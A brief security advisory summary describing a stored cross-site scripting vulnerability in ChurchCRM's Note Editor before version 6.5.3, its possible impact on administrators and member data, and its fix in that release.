ChurchCRM is an open-source church management system. Prior to 6.5.3, a stored Cross-Site Scripting (XSS) vulnerability in ChurchCRM's Note Editor allows authen…

ChurchCRM, an open-source church management system, contains a stored Cross-Site Scripting (XSS) vulnerability in its Note Editor component prior to version 6.5.3. The vulnerability allows authenticated users with note-adding permissions to execute arbitrary JavaScript code in other users' browsers, including administrators. This can result in session hijacking, privilege escalation, and unauthorized access to sensitive church member data. The issue has been resolved in version 6.5.3.